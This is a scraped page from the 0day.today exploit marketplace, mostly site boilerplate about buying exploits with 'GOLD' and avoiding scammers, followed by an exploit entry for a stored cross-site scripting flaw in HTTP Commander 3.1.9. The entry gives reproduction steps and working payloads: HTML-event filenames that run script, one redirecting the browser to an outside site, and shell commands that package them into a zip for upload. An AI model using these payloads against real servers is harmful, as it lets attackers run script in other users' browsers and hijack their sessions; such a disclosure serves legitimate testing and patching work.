0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
HTTP Commander 3.1.9 - Stored Cross Site Scripting Vulnerability
# Exploit Title: HTTP Commander 3.1.9 - Stored Cross Site Scripting (XSS) # Exploit Author: Oscar Sandén # Vendor Homepage: https://www.element-it.com # Software Link: https://www.element-it.com/downloads.aspx # Version: 3.1.9 # Tested on: Windows Server 2016 [Description] There is a stored XSS in the 'Zip content' feature of the HTTP commander application. The vulnerable field is the filename of the files inside the zip. This vulnerability exists in 3.x of the HTTP commander application. [Steps to reproduce] 1) Create a file with a xxs payload in its name. Examples: <img src=x onerror=alert(1)>.txt <img src=x onerror="document.location='https:'+String.fromCharCode(47)+String.fromCharCode(47)+'exploit-db.com'">.txt Or some other JS you like. 2) Zip the files 3) Upload the ZIP-file 4) In HTTP commander, right click the file and select ZIP-content. 5) If the files are in a subfolder, expand it until the filenames are shown. [Exploit] touch payload/<img src=x onerror=alert(1)>.txt Zip -r test.zip /payload # 0day.today [2024-12-25] #